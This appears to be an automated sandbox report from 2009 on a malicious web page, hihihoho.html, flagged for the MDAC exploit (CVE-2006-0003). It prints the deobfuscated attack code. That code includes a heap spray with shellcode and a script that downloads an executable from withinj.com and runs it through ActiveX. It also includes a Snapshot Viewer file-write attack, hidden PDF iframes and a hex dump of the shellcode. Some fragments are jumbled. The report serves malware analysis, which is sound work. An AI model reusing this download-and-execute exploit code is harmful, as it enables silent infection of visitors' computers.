Analysis report for hihihoho.html
Sample Overview
| File | hihihoho.html |
|---|
| MD5 | 4e035b98a661215b740237b2a2d0a26b |
|---|
| Analysis Started | 2009-01-13 04:35:04 |
|---|
| Report Generated | 2009-01-13 04:35:08 |
|---|
| Jsand version | 1.03.02 |
|---|
Detection results
| Detector | Result |
|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|
| MDAC | Arbitrary file download via the Microsoft Data Access Components (MDAC) | CVE-2006-0003 |
Deobfuscation results
Evals
PEELt6.ShellExecute(Frogxa);
Writes
e8 % uaaec % udccb % ubc34 % u10bc" +
" % ucf9a % ubcbf % uaa64 % u85f3 % ub6ea % uba64 %
u07f7 % uefcc % uefef % uef85 % u9a10 % u64cf % ue7aa % ued85 % u64b6 % uf7ba" +
" % uff07
% uefef % u85ef % u6410 % uffaa % uee85 % u64b6 % uf7ba % uef07 % uefef % uaeef % ubdb4 %
u0eec % u0eec % u0eec % u0eec" +
" % u036c % ub5eb % u64bc % u0d35 % ubd18 % u0f10 % u64ba
% u6403 % ue792 % ub264 % ub9e3 % u9c64 % u64d3 % uf19b % uec97 % ub91c" +
" % u9964 %
ueccf % udc1c % ua626 % u42ae % u2cec % udcb9 % ue019 % uff51 % u1dd5 % ue79b % u212e %
uece2 % uaf1d % u1e04 % u11d4" +
" % u9ab1 % ub50a % u0464 % ub564 % ueccb % u8932 % ue364
% u64a4 % uf3b5 % u32ec % ueb64 % uec64 % ub12a % u2db2 % uefe7 % u1b07" +
" % u1011 %
uba10 % ua3bd % ua0a2 % uefa1 % u7468 % u7074 % u2F3A % u772F % u7469 % u6968 % u6A6E %
u632E % u6D6F % u732F % u6174 % u2F74 % u7865 % u2E65 % u6870 % u0070
");
var psrayt = unescape(" % u0a0a % u0a0a");
do {
psrayt += psrayt;
}
while (psrayt.length < 0xd
0000);
meray = new Array();
for(i = 0; i < 100; i++)
meray[i] = psrayt + srtkod;
xmlcode =
"<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATA
SRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SP
AN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
}
if (MDAC()||PDF()|
|WML()||SS()) { }
</script>
div > ');
var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "
%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03
%uefeb" + "
%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66
%ub9e7" + "
%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87
%u0a96" + "
%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa
%uee85" + "
%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf
%ucfaa" + "
%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a
%uebaf" + " % u8a97 % uefef % u9a10 % u64cf % ue3aa % uee85 % u64b6 % uf7ba % uaf07 %
uefef % u85ef % ub7
<SCRIPT language="javascript">
var p_url = "http://withinj.com/stat/exe.php";
function MDAC(){
var nuc='';
d8= 0;
var qbh5gVJ = document.createElement("obje"+nuc+"ct");
qbh5gVJ.setAttribute("id","<?=qb"+nuc+"h5gVJ?>");
qbh5gVJ.setAttribute("c"+nuc+"la"+nuc+"ssi"+nuc+"d","clsid:BD"+nuc+"96C556-65A3-11D"+nuc+"0-983A-"+nuc+"0"+nuc+"0C0"+nuc+"4FC29E36");
try{
var XonDqs = qbh5gVJ.CreateObject("a"+nuc+"do"+nuc+"d"+nuc+"b.st"+nuc+"ream",'');
var d8 = 1;
}catch(e){}
try{
var PEELt6 = qbh5gVJ.CreateObject("Shell.Ap"+nuc+"pl"+nuc+"ica"+nuc+"tion",'');
var d8 = 1;
}
catch(e){}
if(d8 == 1)
{
try
{
var Ebe09i = qbh5gVJ.CreateObject("msxml2"+nuc+".XMLHTTP",'');
Ebe09i.open("G"+nuc+"ET",p_url,false);
Ebe09i.send();
XonDqs.typ
e = 1;
XonDqs.open();
XonDqs.Write(Ebe09i.responseBody);
Frogxa = "..\\S87ekhV.exe";
XonDqs.Save
ToFile(Frogxa,2);
eval("PEELt6.Sh"+nuc+"ellEx"+nuc+"ecute(Fr"+nuc+"ogxa);");
return 1;
}
catch(e){}
}
}
function PDF()
{
document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"
></iframe>
');
}
function SS()
{
var arbitrary_file = p_url;
var dest = 'C:/Program Files/Outlook Express/wab.e
xe';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'>
</object>
");
attack.SnapshotPath = arbitrary_file;
setTimeout('window.location = "ldap://127.0.0.1"',2000);
a
ttack.CompressedPath = dest;
attack.PrintSnapshot(arbitrary_file,dest);
}
function WML()
{
document.
write('<div id="replace">x</
<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>
<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>
<div id="replace">x</div>
Network
Requests
| URL | Status |
|---|
| http://www.cs.ucsb.edu/~marco/jsan/unknown | 200 |
Redirects
No redirects.
ActiveX controls
-
| BD96C556-65A3-11D0-983A-00C04FC29E36 |
|---|
|
Name |
Arg0 |
Arg1 |
Count |
| Methods |
CreateObject |
msxml2.XMLHTTP |
'' |
1 |
Shell.Application |
'' |
1 |
adodb.stream |
'' |
1 |
|
Name | Value | Count |
|---|
| Attributes |
id |
<?=qbh5gVJ?> |
1 |
-
| ADODB.STREAM |
|---|
|
Name |
Arg0 |
Arg1 |
Count |
| Methods |
Write |
(undefined) |
|
1 |
| SaveToFile |
..\S87ekhV.exe |
2.0 |
1 |
| open |
|
|
1 |
|
Name | Value | Count |
|---|
| Attributes |
type |
1.0 |
1 |
-
| SHELL.APPLICATION |
|---|
|
Name |
Arg0 |
Count |
| Methods |
ShellExecute |
..\S87ekhV.exe |
1 |
-
| MSXML2.XMLHTTP |
|---|
|
Name |
Arg0 |
Arg1 |
Arg2 |
Count |
| Methods |
open |
GET |
http://withinj.com/stat/exe.php |
false |
1 |
| send |
|
|
|
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
|---|
43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef
43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef
ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef
ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa
eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9
87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00
21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a
57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66
aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee
b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f
07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf
87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07
8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb
97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7
07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10
9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef
ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7
07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7
07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e
6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64
92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9
64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0
51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11
b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64
b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b
11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f
2f 77 69 74 68 69 6e 6a 2e 63 6f 6d 2f 73 74 61
74 2f 65 78 65 2e 70 68 70 00 | CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/withinj.com/sta
t/exe.php. |
No additional malware was retrieved.